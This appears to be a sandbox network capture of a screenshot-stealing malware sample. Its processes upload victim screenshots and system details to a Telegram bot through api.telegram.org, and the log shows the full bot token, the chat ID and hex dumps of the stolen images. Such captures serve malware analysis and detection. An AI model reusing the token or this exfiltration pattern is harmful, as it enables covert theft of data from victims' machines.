2025-01-10 15:56:01 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:56:01 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201786,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524561,"document":{"file_name":"user-642294 2025-02-10 06-12-40.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUOmeBQxF6J72YJEuuWA-RMnwmhB5UAAIxHQACuyoJUBO6cUOUMaGSAQAHbQADNgQ","file_unique_id":"AQADMR0AArsqCVBy","file_size":10562,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUOmeBQxF6J72YJEuuWA-RMnwmhB5UAAIxHQACuyoJUBO6cUOUMaGSAQAHbQADNgQ","file_unique_id":"AQADMR0AArsqCVBy","file_size":10562,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDpngUMReie9mCRLrlgPkTJ8JoQeVAACMR0AArsqCVATunFDlDGhkjYE","file_unique_id":"AgADMR0AArsqCVA","file_size":57167},"caption":"New SC Recovered!\n\nTime: 02/10/2025 06:02:40\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50001	149.154.167.220	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:56:06 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd54c9da928959 Host: api.telegram.org Content-Length: 57803 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:56:06 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:56:06 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 34 63 39 64 61 39 32 38 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 34 63 39 64 61 39 32 38 39 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 32 34 2f 32 30 32 35 20 31 31 3a 34 33 3a 32 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd54c9da928959Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd54c9da928959Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/24/2025 11:43:27User
2025-01-10 15:56:06 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:56:06 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:56:06 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:56:06 UTC	7664	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:56:06 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 34 63 39 64 61 39 32 38 39 35 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd54c9da928959--
2025-01-10 15:56:07 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:56:07 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201787,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524567,"document":{"file_name":"user-642294 2025-02-24 11-53-28.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUO2eBQxeQTOIuM5js4jzTmMBw7LSbAAIyHQACuyoJUBnjrCNHCLcuAQAHbQADNgQ","file_unique_id":"AQADMh0AArsqCVBy","file_size":10552,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUO2eBQxeQTOIuM5js4jzTmMBw7LSbAAIyHQACuyoJUBnjrCNHCLcuAQAHbQADNgQ","file_unique_id":"AQADMh0AArsqCVBy","file_size":10552,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDtngUMXkEziLjOY7OI805jAcOy0mwACMh0AArsqCVAZ46wjRwi3LjYE","file_unique_id":"AgADMh0AArsqCVA","file_size":57180},"caption":"New SC Recovered!\n\nTime: 02/24/2025 11:43:27\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50003	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:56:24 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd5645c8bf490e Host: api.telegram.org Content-Length: 57803 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:56:24 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 34 35 63 38 62 66 34 39 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 34 35 63 38 62 66 34 39 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 32 36 2f 32 30 32 35 20 30 39 3a 30 33 3a 30 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd5645c8bf490eContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd5645c8bf490eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 02/26/2025 09:03:06User
2025-01-10 15:56:24 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:56:24 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:56:24 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:56:24 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:56:24 UTC	7664	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:56:24 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 34 35 63 38 62 66 34 39 30 65 2d 2d 0d 0a Data Ascii: -----------------------------8dd5645c8bf490e--
2025-01-10 15:56:25 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:56:25 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201788,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524585,"document":{"file_name":"user-642294 2025-02-26 09-13-07.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUPGeBQylSAR36Qau1MlnwTTKWpOulAAI0HQACuyoJUPeS0C1T2xlHAQAHbQADNgQ","file_unique_id":"AQADNB0AArsqCVBy","file_size":10552,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUPGeBQylSAR36Qau1MlnwTTKWpOulAAI0HQACuyoJUPeS0C1T2xlHAQAHbQADNgQ","file_unique_id":"AQADNB0AArsqCVBy","file_size":10552,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDxngUMpUgEd-kGrtTJZ8E0ylqTrpQACNB0AArsqCVD3ktAtU9sZRzYE","file_unique_id":"AgADNB0AArsqCVA","file_size":57180},"caption":"New SC Recovered!\n\nTime: 02/26/2025 09:03:06\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50004	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:56:44 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd5eb8e9bf401e Host: api.telegram.org Content-Length: 57803 Expect: 100-continue
2025-01-10 15:56:44 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:56:44 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 65 62 38 65 39 62 66 34 30 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 65 62 38 65 39 62 66 34 30 31 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 39 2f 32 30 32 35 20 30 33 3a 30 37 3a 32 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd5eb8e9bf401eContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd5eb8e9bf401eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/09/2025 03:07:22User
2025-01-10 15:56:44 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:56:44 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:56:44 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:56:44 UTC	7664	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: 